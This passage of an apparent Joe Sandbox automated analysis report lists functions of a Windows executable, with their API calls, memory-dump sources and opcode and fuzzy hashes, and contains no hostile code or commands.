    • Instruction Fuzzy Hash: 6101F4326046215AEB106F3CFC0895E37649B81331F120B6AF171CF2E2DF34CC458269
    Function 00449C88 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 00449CA6
      • Part of subcall function 0044C6DB: RtlEnterCriticalSection.KERNEL32(?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C703
    • RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 00449CED
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CriticalEnterFreeHeapSection__lock
    • String ID:
    • API String ID: 3012239193-0
    • Opcode ID: e67e375026f5f8ac64ec2d3964216386e20dac02ede79c0c17fe2bbbd77c9705
    • Instruction ID: 352e0a56757a29f70fda5dbbd02c219ebdc15a73ecec0d8b306ef4bd3729acd0
    • Opcode Fuzzy Hash: e67e375026f5f8ac64ec2d3964216386e20dac02ede79c0c17fe2bbbd77c9705
    • Instruction Fuzzy Hash: FCF0F030841202AAFF706B629C46B5F7BA0AF00768F20011FF4102A1D1CB3C5D41AA8C
    Function 00449A38 Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 00449A5A
      • Part of subcall function 0044C6DB: RtlEnterCriticalSection.KERNEL32(?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C703
    • RtlAllocateHeap.NTDLL(00000000,?,0045B068,0000000C,00449AC3,000000E0,00449AEE,?,0044C65E,00000018,0045B3A0,00000008,0044C6F4,?,?), ref: 00449A9B
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AllocateCriticalEnterHeapSection__lock
    • String ID:
    • API String ID: 409319249-0
    • Opcode ID: c95d07dcf0f78300e263533c9e06cc9287d0cfc325b5cf15b522ff1f4b25e003
    • Instruction ID: fdb724486434b2d6e8ccd2904e3ef89b22f67d2e8c8e0598606752c53c52e891
    • Opcode Fuzzy Hash: c95d07dcf0f78300e263533c9e06cc9287d0cfc325b5cf15b522ff1f4b25e003
    • Instruction Fuzzy Hash: 3DF0C231C502509BEB60ABA19C0675F7360AB00768F20422EE8207A2F1C73C5C05A78C
    Function 0044E07D Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
    Download Yara Rule
    APIs
    • HeapCreate.KERNEL32(00000000,00001000,00000000,0044BF66,00000001,?,0045B1B8,00000060), ref: 0044E08E
      • Part of subcall function 0044E0CE: RtlAllocateHeap.KERNEL32(00000000,00000140,0044E0B6,000003F8,?,0045B1B8,00000060), ref: 0044E0DB
    • HeapDestroy.KERNEL32(?,0045B1B8,00000060), ref: 0044E0C1
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Heap$AllocateCreateDestroy
    • String ID:
    • API String ID: 316229882-0
    • Opcode ID: a2267900713be7d8cbac622d64c56fe0b2f8973e4e4a166c9e297e1a64908aa3
    • Instruction ID: ca41273765c5c3aab36d8d05c3b896e55048c7fa67c0c8062e034f08bda47014
    • Opcode Fuzzy Hash: a2267900713be7d8cbac622d64c56fe0b2f8973e4e4a166c9e297e1a64908aa3
    • Instruction Fuzzy Hash: 60E048706613109AFB546B736C0572A36D4FB44747F004C3EF465C61E0EBB8CC449709
    Function 00416168 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
    Download Yara Rule
    APIs
    • EnumResourceNamesW.KERNEL32(00000000,0000000E,0041605B,000000A1,004012E6,000000A1), ref: 00416192
    • LoadImageW.USER32(000000A1,00000001,00000010,00000010,00000000,004012E6), ref: 004161B3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: EnumImageLoadNamesResource
    • String ID:
    • API String ID: 1578290342-0
    • Opcode ID: 249b71e9550ada3b2cdf6ed6da1a3c1595c538e7d83d5dc9b0de724d6460e20e
    • Instruction ID: 388dc2f8e504b4818ad8221c326ea7f1357133d35e6b367d3968a5e83fac51bc
    • Opcode Fuzzy Hash: 249b71e9550ada3b2cdf6ed6da1a3c1595c538e7d83d5dc9b0de724d6460e20e
    • Instruction Fuzzy Hash: D2F06D70244300BBFB218F95ED49B5A3BA5AB40B5AF100D2AF104A55F0E3F4CA90DB9E
    Function 0044FD57 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00455E82,00000000), ref: 0044FD91
    • GetLastError.KERNEL32 ref: 0044FD9B
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseErrorHandleLast
    • String ID:
    • API String ID: 918212764-0
    • Opcode ID: 4ebd943a157eb07ac9634cd6ca5a110ba93b6a05e5397113cf76f4c5a41d9ed1
    • Instruction ID: dfd6dc24ececc12b093a21fe2a3d80e4ea14aafa4b6e7905c67d2704a465acd5
    • Opcode Fuzzy Hash: 4ebd943a157eb07ac9634cd6ca5a110ba93b6a05e5397113cf76f4c5a41d9ed1
    • Instruction Fuzzy Hash: 3601F73AD0165155E7243639680AA5F22548FC1326F25097FF822C72C3DE1CC849419E
    Function 00443162 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE
    • _strcat.LIBCMT ref: 00443184
      • Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
      • Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 00449CED
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharFreeHeapMultiWide__lock_strcat
    • String ID:
    • API String ID: 4005365108-0
    • Opcode ID: 6f95b3db121b7b43249a971d018aadb4568803aa800c71c32b26fff4c7d5fbbc
    • Instruction ID: 279db9349b9432370442bca1a9a1493b0779058484bbe6e66891083dc9997760
    • Opcode Fuzzy Hash: 6f95b3db121b7b43249a971d018aadb4568803aa800c71c32b26fff4c7d5fbbc
    • Instruction Fuzzy Hash: E641CF71900208BBEB20EF62CC86EDFB7B9EF44704F10049FF554A2181D77AAB509B59
    Function 00401852 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00401904: LoadLibraryA.KERNEL32(uxtheme.dll,00401884,74DF0A60,00000000), ref: 0040190F
      • Part of subcall function 00401904: GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00401921
    • FreeLibrary.KERNEL32(?,0047BCF4,00000000,74DF0A60,00000000), ref: 004018E0
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID:
    • API String ID: 145871493-0
    • Opcode ID: afee0c295e40e99ab34158f1244b547d01bcead8f6ed44e632cc355ff5b29751
    • Instruction ID: 01922d125a099be2173beefaa94b615fd73c8a70fa8edead01576b879d90f1d3
    • Opcode Fuzzy Hash: afee0c295e40e99ab34158f1244b547d01bcead8f6ed44e632cc355ff5b29751
    • Instruction Fuzzy Hash: 9F0140B2D04204AFD701BFAAAC0159DBBE4EB94708B10C07BF904E3261D7B85A40DB5E
    Function 004183F6 Relevance: 1.5, APIs: 1, Instructions: 45COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ClearVariant
    • String ID:
    • API String ID: 1473721057-0
    • Opcode ID: 291f538a9b433d0a6d1e82d5f98e660a5483061f2c47a20ab654f08d6a09c4c0
    • Instruction ID: d2bd3d490d9ddfc467a21e27a978dfc4666dbaf1305854362b7c44e4a4fbedf9
    • Opcode Fuzzy Hash: 291f538a9b433d0a6d1e82d5f98e660a5483061f2c47a20ab654f08d6a09c4c0
    • Instruction Fuzzy Hash: 70016D314009128BEB306F16D881AEAB7E5AF50725F31482FF88186221EF6D9CC29A5D
    Function 004129C0 Relevance: 1.5, APIs: 1, Instructions: 33windowCOMMON
    Download Yara Rule
    APIs
    • CreateIcon.USER32(00000020,00000020,00000001,00000001,?,?), ref: 00412A12
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CreateIcon
    • String ID:
    • API String ID: 3625662491-0
    • Opcode ID: 3275a5c83641fd64901501d8a465da21f4f6a3dcd75cd0197712b1158f272966
    • Instruction ID: 8f4eba20f0dd3c68f254ecd256194a12db5acd5393f4aab0f61f7e9ed3e12a4c
    • Opcode Fuzzy Hash: 3275a5c83641fd64901501d8a465da21f4f6a3dcd75cd0197712b1158f272966
    • Instruction Fuzzy Hash: 50F05471A40219BAEB21AA64DC46FDAB2ACBB08704F000476F605F21C1E6F46D548B98
    Function 00414E55 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: c703b52854d76aa319161c5b99ab3c341fa8d321b596a499fcd6fceaba77e700
    • Instruction ID: a7fd8ca27bb0810053334d820270db7b5587be9ae11b805182a5f761d4f63fd8
    • Opcode Fuzzy Hash: c703b52854d76aa319161c5b99ab3c341fa8d321b596a499fcd6fceaba77e700
    • Instruction Fuzzy Hash: 2AC09B34000F105DDE640E385A4D0DA375179C27A5FD41791D479451F2D3394C57F605
    Function 0043138D Relevance: 1.3, APIs: 1, Instructions: 24COMMON
    Download Yara Rule
    APIs
    • CoUninitialize.COMBASE(0045C6D0,00000000,?,0041F99E), ref: 004313CD
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Uninitialize
    • String ID:
    • API String ID: 3861434553-0
    • Opcode ID: c0d1d7e33a4943827e01e4cfbbef932bc404c85381f4d3483751c997e5f8ecfc
    • Instruction ID: df3736b00b7e0be589f0f43ae73a18a9a167cadeb1283b1792a52ecf7f174830
    • Opcode Fuzzy Hash: c0d1d7e33a4943827e01e4cfbbef932bc404c85381f4d3483751c997e5f8ecfc
    • Instruction Fuzzy Hash: 3CE02B71281341DFD720AB709C544673B5ADB88305F185DBFD84687623EEB51886C71D
    Function 00413E1F Relevance: 1.3, APIs: 1, Instructions: 20COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(?,00000000,00413C39,0045C6D0,0040FFF4,0045C6D0,?,?,004105B4,00000000,0047BD30,00000000,0045C6D0,00000000,00000000,0045C6D0), ref: 00413E2F
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: be02e6eaa8a4859ed9f43560e6826dffe5c54d5f09415862a29f698a9fcbb15b
    • Instruction ID: 8d68155d35ff6e49382bc72b4325340e3a7c1b0e2115fedd8b061b5066a75610
    • Opcode Fuzzy Hash: be02e6eaa8a4859ed9f43560e6826dffe5c54d5f09415862a29f698a9fcbb15b
    • Instruction Fuzzy Hash: D0E092B2406B81DF87209F9A95C0447FBE4BA0871A360883FE0DE82A01C378A4858E1A

    Non-executed Functions

    Function 004045EC Relevance: 139.7, APIs: 76, Strings: 3, Instructions: 1483windowfileCOMMON
    Download Yara Rule
    APIs
    • GetClientRect.USER32(?,?), ref: 00404726
    • GetCursorPos.USER32(?), ref: 00404730
    • ScreenToClient.USER32(?,?), ref: 00404749
    • WindowFromPoint.USER32(?,?), ref: 00404788
      • Part of subcall function 0040D33A: 73A246C0.USER32(?,?,?,?,?), ref: 0040D35E
    • 6F59CB00.COMCTL32(?,00000000,00000000,00000000,?,?,?), ref: 00405098
    • 6F59C2F0.COMCTL32(?,00000000,000000F8,000000F0,?,?,?), ref: 004050A5
    • SetCapture.USER32(?,?,?,?), ref: 004050AE
    • CharUpperBuffW.USER32(?,?,@GUI_DRAGID,?,?,?,?), ref: 004050E5
    • ClientToScreen.USER32(?,?), ref: 00405110
    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00405135
    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0040515F
    • GetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 0040523D
    • GetMenuItemCount.USER32(?), ref: 00405256
    • GetMenuItemID.USER32(?,00000000), ref: 00405265
    • GetMenuItemInfoW.USER32(?,-00000001,00000001,0000002C), ref: 0040528E
    • GetMenuItemInfoW.USER32(?,?,00000001,0000002C), ref: 004052B4
    • CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 004052D4
    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00405521
    • DragQueryPoint.SHELL32(?,?), ref: 00405533
    • SendMessageW.USER32(?,000000B0,?,?), ref: 0040558D
    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00405596
    • DragQueryFileW.SHELL32(?,?,?,00000104), ref: 004055BD
    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00405600
    • SendMessageW.USER32(?,000000B0,?,?), ref: 00405610
    • SendMessageW.USER32(?,000000B1,?,?), ref: 0040561A
    • SendMessageW.USER32(?,000000B1,?,?), ref: 0040562F
    • DragFinish.SHELL32(?,?,?,?), ref: 00405634
    • CharUpperBuffW.USER32(?,?,@GUI_DROPID,00000000,?,?,?,?), ref: 00405676
    • CharUpperBuffW.USER32(?,?,@GUI_DRAGID,000000FF,0047BD20,?,?,?,?,?), ref: 004056B3
    • CharUpperBuffW.USER32(?,?,@GUI_DRAGFILE,?,0047BD20,?,?,?,?,?), ref: 004056F0
    • 6F59C580.COMCTL32(00000000), ref: 00405765
    • 6F59C6F0.COMCTL32 ref: 0040576B
    • ReleaseCapture.USER32 ref: 00405771
    • SetWindowTextW.USER32(?,00000000), ref: 004057FD
    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0040580D
    • CharUpperBuffW.USER32(?,?,@GUI_DROPID,?), ref: 00405846
    • CharUpperBuffW.USER32(?,?,@GUI_DRAGFILE,?,0047BD20,?,?), ref: 0040588A
    • 6F59C530.COMCTL32(00000000,?,?,?,?,?), ref: 0040511C
      • Part of subcall function 004183F6: VariantClear.OLEAUT32(?), ref: 00418410
      • Part of subcall function 0040D33A: SendMessageW.USER32(?,00000136,?,?), ref: 0040D3BF
      • Part of subcall function 0040D33A: GetSysColorBrush.USER32(00000005), ref: 0040D3D0
      • Part of subcall function 0040D33A: GetClientRect.USER32(?,?), ref: 0040D3E0
      • Part of subcall function 0040D33A: SetViewportOrgEx.GDI32(?,00000000,00000000,?), ref: 0040D3F3
      • Part of subcall function 0040D33A: FillRect.USER32(?,?,?), ref: 0040D3FD
      • Part of subcall function 0040D33A: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0040D40B
    • ClientToScreen.USER32(?,?), ref: 004058F4
    • 6F59C5D0.COMCTL32(?,?), ref: 00405900
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Message$Send$BuffCharItemMenuUpper$Client$DragRect$InfoQueryScreen$CaptureFilePointViewportWindow$A246BrushC530C580CheckClearColorCountCursorFillFinishFreeFromInvalidateLibraryPostRadioReleaseTextVariant
    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
    • API String ID: 2489294743-3440237614
    • Opcode ID: 0e1426fba7bf2b905aabb8d1a3cfee35b6d16cbe001af558f5860adbfda55722
    • Instruction ID: a85160cf80a5b1f34019e14a663ad150d6ae3ef56b36cf0b8cda9c9ba50d982b
    • Opcode Fuzzy Hash: 0e1426fba7bf2b905aabb8d1a3cfee35b6d16cbe001af558f5860adbfda55722
    • Instruction Fuzzy Hash: 38C27B71500649AFDF259F68CC84BEE3BA9EF04314F14012AFA11A72E2D779E851CF99
    Function 00412196 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 120keyboardthreadwindowCOMMON
    Download Yara Rule
    APIs
    • GetForegroundWindow.USER32(?,?,?,00000000,?,00000000), ref: 0041219B
    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004121C0
    • IsIconic.USER32(?), ref: 004121C9
    • ShowWindow.USER32(?,00000009), ref: 004121D6
    • SetForegroundWindow.USER32(?), ref: 004121DD
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004121F4
    • GetCurrentThreadId.KERNEL32 ref: 004121FC
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041220D
    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0041221D
    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00412223
    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0041222C
    • SetForegroundWindow.USER32(?), ref: 00412232
    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041224B
    • keybd_event.USER32(00000012,00000000), ref: 00412256
    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041225E
    • keybd_event.USER32(00000012,00000000), ref: 00412263
    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041226A
    • keybd_event.USER32(00000012,00000000), ref: 0041226F
    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00412277
    • keybd_event.USER32(00000012,00000000), ref: 0041227C
    • SetForegroundWindow.USER32(?), ref: 00412282
    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0041229A
    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0041229F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
    • String ID: Shell_TrayWnd
    • API String ID: 2889586943-2988720461
    • Opcode ID: 27bde8f325f4ca65f9c45f11051872c97efc407ea39f8a14d5d8c1b3cfdf20f6
    • Instruction ID: cb7438905b74c3bcc21d4994487d953355f125afc937cec0d547d7a337ec13bb
    • Opcode Fuzzy Hash: 27bde8f325f4ca65f9c45f11051872c97efc407ea39f8a14d5d8c1b3cfdf20f6
    • Instruction Fuzzy Hash: 7131D47250030CBFE611AF62DD89E7F7EACDB89B95F020429F60492192D676DC20DA76
